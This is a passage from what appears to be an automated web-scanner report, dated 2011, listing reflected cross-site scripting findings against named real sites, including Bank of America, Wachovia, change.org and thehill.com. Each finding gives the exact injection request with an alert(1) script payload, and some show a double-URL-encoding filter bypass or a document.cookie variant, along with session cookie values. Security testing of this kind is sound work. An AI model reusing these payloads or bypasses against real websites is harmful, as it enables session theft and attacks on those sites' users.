GET /files/file/3944-ipchat-12-turkish-language-pack/?7f9a9"-alert(1)-"dc3219cb2fe=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/?7f9a9"-alert(1)-"dc3219cb2fe=1"; ipb.sharelinks.title = "IP.Chat 1.2 Turkish Language Pack"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.48. http://community.invisionpower.com/resources/documentation/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://community.invisionpower.com
Path:
/resources/documentation/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 455b5'><a>78f4a32a5a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /resources/documentation/index.html?455b5'><a>78f4a32a5a9=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html?455b5'><a>78f4a32a5a9=1' /> ...[SNIP]...
2.49. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dff31'><script>alert(1)</script>1470dab73a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/documentation/index.html/_/documentation/getting-started/installation-r17?dff31'><script>alert(1)</script>1470dab73a4=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17?dff31'><script>alert(1)</script>1470dab73a4=1' /> ...[SNIP]...
2.50. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9564a'><script>alert(1)</script>f6702a3a7ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514?9564a'><script>alert(1)</script>f6702a3a7ba=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514?9564a'><script>alert(1)</script>f6702a3a7ba=1' /> ...[SNIP]...
2.51. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da888'><script>alert(1)</script>8095f60edfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18?da888'><script>alert(1)</script>8095f60edfb=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18?da888'><script>alert(1)</script>8095f60edfb=1' /> ...[SNIP]...
2.52. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3f88'><script>alert(1)</script>0031e83123d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536?f3f88'><script>alert(1)</script>0031e83123d=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536?f3f88'><script>alert(1)</script>0031e83123d=1' /> ...[SNIP]...
2.53. http://community.invisionpower.com/resources/official.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://community.invisionpower.com
Path:
/resources/official.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2e492'><a>093e292e14d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /resources/official.html?2e492'><a>093e292e14d=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf50%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89c53a9cf29 was submitted in the REST URL parameter 2. This input was echoed as 3cf50"><script>alert(1)</script>89c53a9cf29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /japan-news/16713cf50%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89c53a9cf29/tuna-costs-254-000-in-japan/ HTTP/1.1 Host: insidejapantours.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: CSPSESSIONID-SP-80=00000001000039cj9PCk000000iW6rcNrdSziWggn6yemmaw--; path=/; CACHE-CONTROL: no-cache CONNECTION: Close DATE: Thu, 03 Feb 2011 01:03:09 GMT EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT PRAGMA: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <link rel="alternate" type="application/rss+xml" title="Japan ...[SNIP]... <a href="http://del.icio.us/post?url=http://www.insidejapantours.com/japan-news/16713cf50"><script>alert(1)</script>89c53a9cf29/tuna-costs-254-000-in-japan/&title=Chinese%20New%20Year%20boosts%20Japan%20tourism"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d11%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3dcc286b11c was submitted in the REST URL parameter 3. This input was echoed as c2d11"><script>alert(1)</script>3dcc286b11c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /japan-news/1671/tuna-costs-254-000-in-japanc2d11%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3dcc286b11c/ HTTP/1.1 Host: insidejapantours.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: CSPSESSIONID-SP-80=00000001000039cn9Q4p0000004Xg2fUaiviCivWQ_RWXE4w--; path=/; CACHE-CONTROL: no-cache CONNECTION: Close DATE: Thu, 03 Feb 2011 01:03:12 GMT EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT PRAGMA: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <link rel="alternate" type="application/rss+xml" title="Japan ...[SNIP]... <a href="http://del.icio.us/post?url=http://www.insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japanc2d11"><script>alert(1)</script>3dcc286b11c/&title=Tuna%20costs%20%A3254%2C000%20in%20Japan"> ...[SNIP]...
2.56. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bf2b</script><script>alert(1)</script>36bc7e08caf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b</script><script>alert(1)</script>36bc7e08caf=1 HTTP/1.1 Host: news.change.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.57. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://privacyassist.bankofamerica.com
Path:
/Pages/English/In_Activation.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e508d"-alert(1)-"e0d6dc517b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Pages/English/In_Activation.asp?e508d"-alert(1)-"e0d6dc517b3=1 HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33448 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDAGCQRSRC=NBDJILIAKMMGBBIBOJIMHFBD; secure; path=/ Date: Wed, 02 Feb 2011 21:59:58 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]... <!-- function GoPage(page) { var sSQuery = "e508d"-alert(1)-"e0d6dc517b3=1";
2.58. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://privacyassist.bankofamerica.com
Path:
/Pages/English/In_Activation.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73a68'-alert(1)-'bbae7f15828 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Pages/English/In_Activation.asp?73a68'-alert(1)-'bbae7f15828=1 HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33448 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDAGCQRSRC=BCDJILIAFFAGBBIDFABDKBNE; secure; path=/ Date: Wed, 02 Feb 2011 21:59:59 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]... <!-- var strHref = 'https://' + 'privacyassist.bankofamerica.com' + '/pages/english/in_activation.asp' + '?73a68'-alert(1)-'bbae7f15828=1'; strHref = strHref.toLowerCase() if (strHref.indexOf('lm_fraudprotect') < 0 && strHref.indexOf('lm_cardregistry') < 0 && strHref.indexOf('lm_creditreport') < 0 ) { v ...[SNIP]...
2.59. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://privacyassist.bankofamerica.com
Path:
/Pages/English/In_Activation.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6508"><a>a5002a02ed4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /Pages/English/In_Activation.asp?e6508"><a>a5002a02ed4=1 HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33648 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDAGCQRSRC=NADJILIAAEJKGBMFKCCKAKFC; secure; path=/ Date: Wed, 02 Feb 2011 21:59:54 GMT Connection: close
<script type="text/javascript"> alert ("Special Characters are not allowed."); location.href = "http://www.bankofamerica.com"; </script>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Tr ...[SNIP]... <a class="menu" title="Home" name="Home_Header_Login.asp" href="https://privacyassist.bankofamerica.com/home.asp?e6508"><a>a5002a02ed4=1"> ...[SNIP]...
2.60. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.wachovia.com
Path:
/selfservice/microsites/wachoviaSearchEntry.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c128"><script>alert(1)</script>0f891e45ab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /selfservice/microsites/wachoviaSearchEntry.do?9c128"><script>alert(1)</script>0f891e45ab3=1 HTTP/1.1 Host: search.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=C50552A4ACD37FDD2EC8A63C0E354E97; Path=/selfservice Content-Type: text/html;charset=UTF-8 Date: Wed, 02 Feb 2011 22:02:36 GMT Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8b75"><script>alert(1)</script>47d05c4592a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ip-boardc8b75"><script>alert(1)</script>47d05c4592a/ HTTP/1.1 Host: search.wareseeker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:24:37 GMT Server: Apache Set-Cookie: PHPSESSID=4rtpcdn9ep0nfp5tqbhmaq6ve1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 55139
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type ...[SNIP]... <a title="ip boardc8b75 script alert 1 script 47d05c4592a Free Download - windows software" href="http://download.wareseeker.com/ip-boardc8b75"><script>alert(1)</script>47d05c4592a/" class="selected allsoftware"> ...[SNIP]...
2.62. http://search.wareseeker.com/ip-board/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.wareseeker.com
Path:
/ip-board/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad93e"><script>alert(1)</script>125f5dcb899 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ip-board/?ad93e"><script>alert(1)</script>125f5dcb899=1 HTTP/1.1 Host: search.wareseeker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:24:34 GMT Server: Apache Set-Cookie: PHPSESSID=v5k6266f8pht791v1r546ej5o3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56242
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type ...[SNIP]... <a rel="nofollow" href="http://search.wareseeker.com/ip-board/?ad93e"><script>alert(1)</script>125f5dcb899=1p-2/"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a25e7<a>ea4068e9f94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/WareSeekercoma25e7<a>ea4068e9f94/ROS/tags.js HTTP/1.1 Host: tags.expo9.exponential.com Proxy-Connection: keep-alive Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 66ae8<a>a5a81e35302 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/WareSeekercom/ROS66ae8<a>a5a81e35302/tags.js HTTP/1.1 Host: tags.expo9.exponential.com Proxy-Connection: keep-alive Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
function expo9_ad() { var t = this; t.host = "a.tribalfusion.com"; t.site = "wareseekercom"; t.adSpace = "ros66ae8<a>a5a81e35302"; t.tagKey = "1282868635"; t.tKey = e9TKey; t.pageId = expo9_pageId; t.center = 1; t.flashVer = 0; t.tagHash = makeTagHash(); t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650aa'><script>alert(1)</script>2295b33377e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/e2-wire/677-e2-wire650aa'><script>alert(1)</script>2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more HTTP/1.1 Host: thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:08 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Thu, 03 Feb 2011 01:20:18 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Set-Cookie: PHPSESSID=en4idpn2cplbg96q3m2b2f49c7; path=/ Connection: close Content-Length: 73997
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <a href='/blogs/e2-wire/677-e2-wire650aa'><script>alert(1)</script>2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more#comments'> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f52a1'><script>alert(1)</script>1f00b24b3b4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-moref52a1'><script>alert(1)</script>1f00b24b3b4 HTTP/1.1 Host: thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 02:00:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Thu, 03 Feb 2011 02:15:21 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Set-Cookie: PHPSESSID=2tr8nhs6ici1dq18j4impjn8o0; path=/ Connection: close Content-Length: 76050
